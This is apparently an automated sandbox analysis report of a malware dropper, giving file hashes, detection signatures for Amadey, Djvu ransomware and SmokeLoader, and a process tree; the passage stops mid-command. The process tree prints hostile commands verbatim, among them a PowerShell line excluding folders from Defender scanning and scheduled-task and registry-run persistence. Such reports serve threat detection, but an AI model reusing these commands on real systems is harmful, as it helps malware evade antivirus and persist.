SHA512 9435e7c88033b1fb34508027e9354d2c6ff393b26311644ad9c94de2c22e98971f019b9457938bc37bcb76b3697d82da1d14baac8dd3b12db2563705d6aeee73

memory/332-275-0x0000000000400000-0x0000000000537000-memory.dmp

\Users\Admin\AppData\Local\Temp\233E.exe

MD5 a356ca2c24a9d156641f4140d5d8f9db
SHA1 75be657cab68221785bcaf8c16cf5d7dc81e0961
SHA256 0ac65da52d7a63e098d05b33da91b1e26a9d6b2d47cb0b40112dba5020ea8dc5
SHA512 899facb28a19186a189aad5fdab1426a9a52d1e5d11bb3b85f59c45a94e8891a718fe02e5672399586b004360b4bc8f6c41bdea0019a8d093153ec085cfbc934

\Users\Admin\AppData\Local\Temp\233E.exe

MD5 a356ca2c24a9d156641f4140d5d8f9db
SHA1 75be657cab68221785bcaf8c16cf5d7dc81e0961
SHA256 0ac65da52d7a63e098d05b33da91b1e26a9d6b2d47cb0b40112dba5020ea8dc5
SHA512 899facb28a19186a189aad5fdab1426a9a52d1e5d11bb3b85f59c45a94e8891a718fe02e5672399586b004360b4bc8f6c41bdea0019a8d093153ec085cfbc934

C:\Users\Admin\AppData\Local\Temp\233E.exe

MD5 a356ca2c24a9d156641f4140d5d8f9db
SHA1 75be657cab68221785bcaf8c16cf5d7dc81e0961
SHA256 0ac65da52d7a63e098d05b33da91b1e26a9d6b2d47cb0b40112dba5020ea8dc5
SHA512 899facb28a19186a189aad5fdab1426a9a52d1e5d11bb3b85f59c45a94e8891a718fe02e5672399586b004360b4bc8f6c41bdea0019a8d093153ec085cfbc934

memory/2760-278-0x0000000000230000-0x00000000002C1000-memory.dmp

memory/2760-279-0x0000000000230000-0x00000000002C1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\2F12.exe

MD5 329d7c6568113a9cc2904037638bb518
SHA1 1044bb723ad24a89bab8875879db06ac4435362d
SHA256 27a2a14ddca16851acaddb42a20201ed175878c868e1ecc7499a3fd4cf4eaa55
SHA512 9435e7c88033b1fb34508027e9354d2c6ff393b26311644ad9c94de2c22e98971f019b9457938bc37bcb76b3697d82da1d14baac8dd3b12db2563705d6aeee73

\Users\Admin\AppData\Local\Temp\2F12.exe

MD5 329d7c6568113a9cc2904037638bb518
SHA1 1044bb723ad24a89bab8875879db06ac4435362d
SHA256 27a2a14ddca16851acaddb42a20201ed175878c868e1ecc7499a3fd4cf4eaa55
SHA512 9435e7c88033b1fb34508027e9354d2c6ff393b26311644ad9c94de2c22e98971f019b9457938bc37bcb76b3697d82da1d14baac8dd3b12db2563705d6aeee73

memory/3008-286-0x0000000002560000-0x00000000025F2000-memory.dmp

memory/1428-294-0x0000000000400000-0x0000000000537000-memory.dmp

memory/3008-297-0x0000000002560000-0x00000000025F2000-memory.dmp

memory/3016-298-0x0000000002C30000-0x0000000002D61000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\3653.exe

MD5 329d7c6568113a9cc2904037638bb518
SHA1 1044bb723ad24a89bab8875879db06ac4435362d
SHA256 27a2a14ddca16851acaddb42a20201ed175878c868e1ecc7499a3fd4cf4eaa55
SHA512 9435e7c88033b1fb34508027e9354d2c6ff393b26311644ad9c94de2c22e98971f019b9457938bc37bcb76b3697d82da1d14baac8dd3b12db2563705d6aeee73

C:\Users\Admin\AppData\Local\Temp\2F12.exe

MD5 329d7c6568113a9cc2904037638bb518
SHA1 1044bb723ad24a89bab8875879db06ac4435362d
SHA256 27a2a14ddca16851acaddb42a20201ed175878c868e1ecc7499a3fd4cf4eaa55
SHA512 9435e7c88033b1fb34508027e9354d2c6ff393b26311644ad9c94de2c22e98971f019b9457938bc37bcb76b3697d82da1d14baac8dd3b12db2563705d6aeee73

memory/1428-285-0x0000000000400000-0x0000000000537000-memory.dmp

\Users\Admin\AppData\Local\Temp\233E.exe

MD5 a356ca2c24a9d156641f4140d5d8f9db
SHA1 75be657cab68221785bcaf8c16cf5d7dc81e0961
SHA256 0ac65da52d7a63e098d05b33da91b1e26a9d6b2d47cb0b40112dba5020ea8dc5
SHA512 899facb28a19186a189aad5fdab1426a9a52d1e5d11bb3b85f59c45a94e8891a718fe02e5672399586b004360b4bc8f6c41bdea0019a8d093153ec085cfbc934

memory/2800-304-0x0000000000400000-0x0000000000537000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\233E.exe

MD5 a356ca2c24a9d156641f4140d5d8f9db
SHA1 75be657cab68221785bcaf8c16cf5d7dc81e0961
SHA256 0ac65da52d7a63e098d05b33da91b1e26a9d6b2d47cb0b40112dba5020ea8dc5
SHA512 899facb28a19186a189aad5fdab1426a9a52d1e5d11bb3b85f59c45a94e8891a718fe02e5672399586b004360b4bc8f6c41bdea0019a8d093153ec085cfbc934

C:\Users\Admin\AppData\Local\ed798ea6-f13c-45b3-8b5e-c05ebbc5c544\build2.exe

MD5 5c08a40f82908735b187705b49de1fc3
SHA1 6e108f3f6611f46941869d7fcbe02c47219c0523
SHA256 7539d1cff13c822fbffc73cb9416dd8ae40d79f59b03b1e77b0909e182b6bd2b
SHA512 76d06c1686e1ec9bec07188769e3a851b98f042e962eee74bd195e156d15fd9ebc4997b10af092561178ef3918e86dd620d7070934db7b1f5a5449c19cfbe1fd

\Users\Admin\AppData\Local\ed798ea6-f13c-45b3-8b5e-c05ebbc5c544\build2.exe

MD5 5c08a40f82908735b187705b49de1fc3
SHA1 6e108f3f6611f46941869d7fcbe02c47219c0523
SHA256 7539d1cff13c822fbffc73cb9416dd8ae40d79f59b03b1e77b0909e182b6bd2b
SHA512 76d06c1686e1ec9bec07188769e3a851b98f042e962eee74bd195e156d15fd9ebc4997b10af092561178ef3918e86dd620d7070934db7b1f5a5449c19cfbe1fd

\Users\Admin\AppData\Local\ed798ea6-f13c-45b3-8b5e-c05ebbc5c544\build2.exe

MD5 5c08a40f82908735b187705b49de1fc3
SHA1 6e108f3f6611f46941869d7fcbe02c47219c0523
SHA256 7539d1cff13c822fbffc73cb9416dd8ae40d79f59b03b1e77b0909e182b6bd2b
SHA512 76d06c1686e1ec9bec07188769e3a851b98f042e962eee74bd195e156d15fd9ebc4997b10af092561178ef3918e86dd620d7070934db7b1f5a5449c19cfbe1fd

memory/828-322-0x0000000000340000-0x00000000003D1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\3653.exe

MD5 329d7c6568113a9cc2904037638bb518
SHA1 1044bb723ad24a89bab8875879db06ac4435362d
SHA256 27a2a14ddca16851acaddb42a20201ed175878c868e1ecc7499a3fd4cf4eaa55
SHA512 9435e7c88033b1fb34508027e9354d2c6ff393b26311644ad9c94de2c22e98971f019b9457938bc37bcb76b3697d82da1d14baac8dd3b12db2563705d6aeee73

\Users\Admin\AppData\Local\Temp\3653.exe

MD5 329d7c6568113a9cc2904037638bb518
SHA1 1044bb723ad24a89bab8875879db06ac4435362d
SHA256 27a2a14ddca16851acaddb42a20201ed175878c868e1ecc7499a3fd4cf4eaa55
SHA512 9435e7c88033b1fb34508027e9354d2c6ff393b26311644ad9c94de2c22e98971f019b9457938bc37bcb76b3697d82da1d14baac8dd3b12db2563705d6aeee73

memory/2540-312-0x0000000000400000-0x0000000000537000-memory.dmp

C:\Users\Admin\AppData\Local\ed798ea6-f13c-45b3-8b5e-c05ebbc5c544\build2.exe

MD5 5c08a40f82908735b187705b49de1fc3
SHA1 6e108f3f6611f46941869d7fcbe02c47219c0523
SHA256 7539d1cff13c822fbffc73cb9416dd8ae40d79f59b03b1e77b0909e182b6bd2b
SHA512 76d06c1686e1ec9bec07188769e3a851b98f042e962eee74bd195e156d15fd9ebc4997b10af092561178ef3918e86dd620d7070934db7b1f5a5449c19cfbe1fd

C:\Users\Admin\AppData\Local\ed798ea6-f13c-45b3-8b5e-c05ebbc5c544\build3.exe

MD5 9ead10c08e72ae41921191f8db39bc16
SHA1 abe3bce01cd34afc88e2c838173f8c2bd0090ae1
SHA256 8d7f0e6b6877bdfb9f4531afafd0451f7d17f0ac24e2f2427e9b4ecc5452b9f0
SHA512 aa35dbc59a3589df2763e76a495ce5a9e62196628b4c1d098add38bd7f27c49edf93a66fb8507fb746e37ee32932da2460e440f241abe1a5a279abcc1e5ffe4a

\Users\Admin\AppData\Local\ed798ea6-f13c-45b3-8b5e-c05ebbc5c544\build3.exe

MD5 9ead10c08e72ae41921191f8db39bc16
SHA1 abe3bce01cd34afc88e2c838173f8c2bd0090ae1
SHA256 8d7f0e6b6877bdfb9f4531afafd0451f7d17f0ac24e2f2427e9b4ecc5452b9f0
SHA512 aa35dbc59a3589df2763e76a495ce5a9e62196628b4c1d098add38bd7f27c49edf93a66fb8507fb746e37ee32932da2460e440f241abe1a5a279abcc1e5ffe4a

C:\Users\Admin\AppData\Local\Temp\3653.exe

MD5 329d7c6568113a9cc2904037638bb518
SHA1 1044bb723ad24a89bab8875879db06ac4435362d
SHA256 27a2a14ddca16851acaddb42a20201ed175878c868e1ecc7499a3fd4cf4eaa55
SHA512 9435e7c88033b1fb34508027e9354d2c6ff393b26311644ad9c94de2c22e98971f019b9457938bc37bcb76b3697d82da1d14baac8dd3b12db2563705d6aeee73

\Users\Admin\AppData\Local\ed798ea6-f13c-45b3-8b5e-c05ebbc5c544\build3.exe

MD5 9ead10c08e72ae41921191f8db39bc16
SHA1 abe3bce01cd34afc88e2c838173f8c2bd0090ae1
SHA256 8d7f0e6b6877bdfb9f4531afafd0451f7d17f0ac24e2f2427e9b4ecc5452b9f0
SHA512 aa35dbc59a3589df2763e76a495ce5a9e62196628b4c1d098add38bd7f27c49edf93a66fb8507fb746e37ee32932da2460e440f241abe1a5a279abcc1e5ffe4a

C:\Users\Admin\AppData\Local\ed798ea6-f13c-45b3-8b5e-c05ebbc5c544\build3.exe

MD5 9ead10c08e72ae41921191f8db39bc16
SHA1 abe3bce01cd34afc88e2c838173f8c2bd0090ae1
SHA256 8d7f0e6b6877bdfb9f4531afafd0451f7d17f0ac24e2f2427e9b4ecc5452b9f0
SHA512 aa35dbc59a3589df2763e76a495ce5a9e62196628b4c1d098add38bd7f27c49edf93a66fb8507fb746e37ee32932da2460e440f241abe1a5a279abcc1e5ffe4a

C:\Users\Admin\AppData\Local\ed798ea6-f13c-45b3-8b5e-c05ebbc5c544\build3.exe

MD5 9ead10c08e72ae41921191f8db39bc16
SHA1 abe3bce01cd34afc88e2c838173f8c2bd0090ae1
SHA256 8d7f0e6b6877bdfb9f4531afafd0451f7d17f0ac24e2f2427e9b4ecc5452b9f0
SHA512 aa35dbc59a3589df2763e76a495ce5a9e62196628b4c1d098add38bd7f27c49edf93a66fb8507fb746e37ee32932da2460e440f241abe1a5a279abcc1e5ffe4a

\Users\Admin\AppData\Local\Temp\2773.exe

MD5 329d7c6568113a9cc2904037638bb518
SHA1 1044bb723ad24a89bab8875879db06ac4435362d
SHA256 27a2a14ddca16851acaddb42a20201ed175878c868e1ecc7499a3fd4cf4eaa55
SHA512 9435e7c88033b1fb34508027e9354d2c6ff393b26311644ad9c94de2c22e98971f019b9457938bc37bcb76b3697d82da1d14baac8dd3b12db2563705d6aeee73

\Users\Admin\AppData\Local\Temp\2773.exe

MD5 329d7c6568113a9cc2904037638bb518
SHA1 1044bb723ad24a89bab8875879db06ac4435362d
SHA256 27a2a14ddca16851acaddb42a20201ed175878c868e1ecc7499a3fd4cf4eaa55
SHA512 9435e7c88033b1fb34508027e9354d2c6ff393b26311644ad9c94de2c22e98971f019b9457938bc37bcb76b3697d82da1d14baac8dd3b12db2563705d6aeee73

C:\Users\Admin\AppData\Local\Temp\2773.exe

MD5 329d7c6568113a9cc2904037638bb518
SHA1 1044bb723ad24a89bab8875879db06ac4435362d
SHA256 27a2a14ddca16851acaddb42a20201ed175878c868e1ecc7499a3fd4cf4eaa55
SHA512 9435e7c88033b1fb34508027e9354d2c6ff393b26311644ad9c94de2c22e98971f019b9457938bc37bcb76b3697d82da1d14baac8dd3b12db2563705d6aeee73

memory/2404-359-0x0000000000400000-0x0000000000537000-memory.dmp

\Users\Admin\AppData\Local\Temp\2773.exe

MD5 329d7c6568113a9cc2904037638bb518
SHA1 1044bb723ad24a89bab8875879db06ac4435362d
SHA256 27a2a14ddca16851acaddb42a20201ed175878c868e1ecc7499a3fd4cf4eaa55
SHA512 9435e7c88033b1fb34508027e9354d2c6ff393b26311644ad9c94de2c22e98971f019b9457938bc37bcb76b3697d82da1d14baac8dd3b12db2563705d6aeee73

memory/484-384-0x0000000003D90000-0x0000000003E21000-memory.dmp

memory/484-391-0x0000000003D90000-0x0000000003E21000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\2773.exe

MD5 329d7c6568113a9cc2904037638bb518
SHA1 1044bb723ad24a89bab8875879db06ac4435362d
SHA256 27a2a14ddca16851acaddb42a20201ed175878c868e1ecc7499a3fd4cf4eaa55
SHA512 9435e7c88033b1fb34508027e9354d2c6ff393b26311644ad9c94de2c22e98971f019b9457938bc37bcb76b3697d82da1d14baac8dd3b12db2563705d6aeee73

memory/2800-395-0x0000000000400000-0x0000000000537000-memory.dmp

memory/1028-400-0x0000000002560000-0x00000000025F1000-memory.dmp

memory/2540-398-0x0000000000400000-0x0000000000537000-memory.dmp

memory/692-410-0x0000000000400000-0x0000000000537000-memory.dmp

memory/2816-440-0x00000000002F0000-0x0000000000381000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\BB3F.exe

MD5 c43cbad7257cba5352f8b9eaa19c7709
SHA1 04179590b7da86e2bc79425d544d347c7de7b0fc
SHA256 f0c7026d5e40c38d3ce5ca2669f57da25992dff637753b0220a66994decadde4
SHA512 a14c05344d6f9279d733b23d3dbc8e3a8b06b4114976f508d7336ad7aeddd6a532fa27c65f8e34593e4d8f84aa1874d53b960f72a1ac45a2b7c514f57cbae0e8

C:\Users\Admin\AppData\Local\Temp\EAF9.exe

MD5 8fa8bfb9b75a7c33d9d8cc65a7172a7c
SHA1 0766beb4e4dec3196f95e10044e792862ca83c3b
SHA256 07ad5d7c0500cbdeb837ad3e40946a6bcfca31f2e68ef316106513f40e8b55cd
SHA512 13b7424794326aaf16a8716d063cb2a5dc89b784d0148cfd6b7b744a4eb3cca6384d1a78af91c1ae3dc04dfafa4b5d04f8d271b16e06449eb97dcb8238ed6ecc

memory/2624-483-0x0000000000F60000-0x00000000013E4000-memory.dmp

memory/1136-494-0x0000000004050000-0x0000000004088000-memory.dmp

memory/1136-518-0x0000000004140000-0x0000000004174000-memory.dmp

memory/1740-537-0x000000001B180000-0x000000001B462000-memory.dmp

memory/1740-538-0x0000000001E90000-0x0000000001E98000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2023-07-23 22:48

Reported

2023-07-23 22:50

Platform

win10v2004-20230703-en

Max time kernel

29s

Max time network

153s

Command Line

"C:\Users\Admin\AppData\Local\Temp\file.exe"

Signatures

Amadey

trojan amadey

Detect Fabookie payload

Description Indicator Process Target
N/A N/A N/A N/A

Detected Djvu ransomware

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Djvu Ransomware

ransomware djvu

Fabookie

spyware stealer fabookie

SmokeLoader

trojan backdoor smokeloader

Downloads MZ/PE file

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2700 set thread context of 4080 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\FF40.exe

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\file.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\file.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\file.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3188 wrote to memory of 2700 N/A N/A C:\Users\Admin\AppData\Local\Temp\FF40.exe
PID 3188 wrote to memory of 2700 N/A N/A C:\Users\Admin\AppData\Local\Temp\FF40.exe
PID 3188 wrote to memory of 2700 N/A N/A C:\Users\Admin\AppData\Local\Temp\FF40.exe
PID 3188 wrote to memory of 4076 N/A N/A C:\Windows\system32\regsvr32.exe
PID 3188 wrote to memory of 4076 N/A N/A C:\Windows\system32\regsvr32.exe
PID 4076 wrote to memory of 4848 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 4076 wrote to memory of 4848 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 4076 wrote to memory of 4848 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 3188 wrote to memory of 1208 N/A N/A C:\Windows\system32\regsvr32.exe
PID 3188 wrote to memory of 1208 N/A N/A C:\Windows\system32\regsvr32.exe
PID 1208 wrote to memory of 3880 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1208 wrote to memory of 3880 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1208 wrote to memory of 3880 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2700 wrote to memory of 4080 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\FF40.exe
PID 2700 wrote to memory of 4080 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\FF40.exe
PID 2700 wrote to memory of 4080 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\FF40.exe
PID 2700 wrote to memory of 4080 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\FF40.exe
PID 2700 wrote to memory of 4080 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\FF40.exe
PID 2700 wrote to memory of 4080 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\FF40.exe
PID 2700 wrote to memory of 4080 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\FF40.exe
PID 2700 wrote to memory of 4080 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\FF40.exe
PID 2700 wrote to memory of 4080 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\FF40.exe
PID 2700 wrote to memory of 4080 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\FF40.exe
PID 3188 wrote to memory of 1048 N/A N/A C:\Users\Admin\AppData\Local\Temp\667.exe
PID 3188 wrote to memory of 1048 N/A N/A C:\Users\Admin\AppData\Local\Temp\667.exe
PID 3188 wrote to memory of 1048 N/A N/A C:\Users\Admin\AppData\Local\Temp\667.exe
PID 3188 wrote to memory of 4356 N/A N/A C:\Users\Admin\AppData\Local\Temp\CD0.exe
PID 3188 wrote to memory of 4356 N/A N/A C:\Users\Admin\AppData\Local\Temp\CD0.exe
PID 3188 wrote to memory of 4356 N/A N/A C:\Users\Admin\AppData\Local\Temp\CD0.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\file.exe

"C:\Users\Admin\AppData\Local\Temp\file.exe"

C:\Users\Admin\AppData\Local\Temp\FF40.exe

C:\Users\Admin\AppData\Local\Temp\FF40.exe

C:\Windows\system32\regsvr32.exe

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\154.dll

C:\Windows\SysWOW64\regsvr32.exe

/s C:\Users\Admin\AppData\Local\Temp\154.dll

C:\Windows\system32\regsvr32.exe

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\26E.dll

C:\Windows\SysWOW64\regsvr32.exe

/s C:\Users\Admin\AppData\Local\Temp\26E.dll

C:\Users\Admin\AppData\Local\Temp\FF40.exe

C:\Users\Admin\AppData\Local\Temp\FF40.exe

C:\Users\Admin\AppData\Local\Temp\667.exe

C:\Users\Admin\AppData\Local\Temp\667.exe

C:\Users\Admin\AppData\Local\Temp\CD0.exe

C:\Users\Admin\AppData\Local\Temp\CD0.exe

C:\Users\Admin\AppData\Local\Temp\aafg31.exe

"C:\Users\Admin\AppData\Local\Temp\aafg31.exe"

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Users\Admin\AppData\Local\426bb5c0-c9fc-47c8-832c-c6a9c770bcc9" /deny *S-1-1-0:(OI)(CI)(DE,DC)

C:\Users\Admin\AppData\Local\Temp\oldplayer.exe

"C:\Users\Admin\AppData\Local\Temp\oldplayer.exe"

C:\Users\Admin\AppData\Local\Temp\1722.exe

C:\Users\Admin\AppData\Local\Temp\1722.exe

C:\Users\Admin\AppData\Local\Temp\XandETC.exe

"C:\Users\Admin\AppData\Local\Temp\XandETC.exe"

C:\Users\Admin\AppData\Local\Temp\1A9E.exe

C:\Users\Admin\AppData\Local\Temp\1A9E.exe

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe

"C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe"

C:\Users\Admin\AppData\Local\Temp\1D00.exe

C:\Users\Admin\AppData\Local\Temp\1D00.exe

C:\Users\Admin\AppData\Local\Temp\1722.exe

C:\Users\Admin\AppData\Local\Temp\1722.exe

C:\Users\Admin\AppData\Local\Temp\1F05.exe

C:\Users\Admin\AppData\Local\Temp\1F05.exe

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe" /F

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "oneetx.exe" /P "Admin:N"&&CACLS "oneetx.exe" /P "Admin:R" /E&&echo Y|CACLS "..\207aa4515d" /P "Admin:N"&&CACLS "..\207aa4515d" /P "Admin:R" /E&&Exit

C:\Users\Admin\AppData\Local\Temp\1A9E.exe

C:\Users\Admin\AppData\Local\Temp\1A9E.exe

C:\Users\Admin\AppData\Local\Temp\1D00.exe

C:\Users\Admin\AppData\Local\Temp\1D00.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\207aa4515d" /P "Admin:R" /E

C:\Users\Admin\AppData\Local\Temp\29F2.exe

C:\Users\Admin\AppData\Local\Temp\29F2.exe

C:\Users\Admin\AppData\Local\Temp\2E69.exe

C:\Users\Admin\AppData\Local\Temp\2E69.exe

C:\Users\Admin\AppData\Local\Temp\29F2.exe

C:\Users\Admin\AppData\Local\Temp\29F2.exe

C:\Windows\SysWOW64\regsvr32.exe

/s C:\Users\Admin\AppData\Local\Temp\2CB3.dll

C:\Users\Admin\AppData\Local\Temp\1722.exe

"C:\Users\Admin\AppData\Local\Temp\1722.exe" --Admin IsNotAutoStart IsNotTask

C:\Users\Admin\AppData\Local\Temp\FF40.exe

"C:\Users\Admin\AppData\Local\Temp\FF40.exe" --Admin IsNotAutoStart IsNotTask

C:\Windows\system32\regsvr32.exe

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\2CB3.dll

C:\Users\Admin\AppData\Local\Temp\334C.exe

C:\Users\Admin\AppData\Local\Temp\334C.exe

C:\Windows\SysWOW64\cacls.exe

CACLS "..\207aa4515d" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "oneetx.exe" /P "Admin:R" /E

C:\Windows\SysWOW64\cacls.exe

CACLS "oneetx.exe" /P "Admin:N"

C:\Users\Admin\AppData\Local\Temp\1F05.exe

C:\Users\Admin\AppData\Local\Temp\1F05.exe

C:\Users\Admin\AppData\Local\Temp\2E69.exe

C:\Users\Admin\AppData\Local\Temp\2E69.exe

C:\Users\Admin\AppData\Local\Temp\AB4C.exe

C:\Users\Admin\AppData\Local\Temp\AB4C.exe

C:\Users\Admin\AppData\Local\Temp\1722.exe

"C:\Users\Admin\AppData\Local\Temp\1722.exe" --Admin IsNotAutoStart IsNotTask

C:\Users\Admin\AppData\Local\Temp\1F05.exe

"C:\Users\Admin\AppData\Local\Temp\1F05.exe" --Admin IsNotAutoStart IsNotTask

C:\Users\Admin\AppData\Local\Temp\1D00.exe

"C:\Users\Admin\AppData\Local\Temp\1D00.exe" --Admin IsNotAutoStart IsNotTask

C:\Users\Admin\AppData\Local\Temp\1A9E.exe

"C:\Users\Admin\AppData\Local\Temp\1A9E.exe" --Admin IsNotAutoStart IsNotTask

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wsyzqeupt#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'NoteUpdateTaskMachineQC' /tr '''C:\Program Files\Notepad\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Notepad\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'NoteUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "NoteUpdateTaskMachineQC" /t REG_SZ /f /d 